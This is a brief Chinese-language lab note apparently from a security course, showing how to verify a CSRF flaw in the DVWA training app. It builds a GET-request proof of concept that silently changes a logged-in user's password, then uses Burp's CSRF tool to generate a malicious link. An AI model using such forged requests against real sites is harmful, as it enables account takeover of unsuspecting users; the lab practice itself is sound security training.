CSRF 漏洞验证
dvwa csrf
打开 dvwa csrf
右键检查表单
构造 poc
password_new=777&password_conf=777&Change=Change
http://10.1.1.5/dvwa_2.0.1/vulnerabilities/csrf/?password_new=777&password_conf=777&Change=Change
在没有退出 dvwa 的情况下访问页面
密码被改为777
burp
修改登录密码
bp 抓包
使用 CSRF 工具
修改原密码
生成恶意网址
用户访问
密码被修改为 password
[外链图片转存中…(img-CdnvjkOM-1700034981498)]密码被修改为 password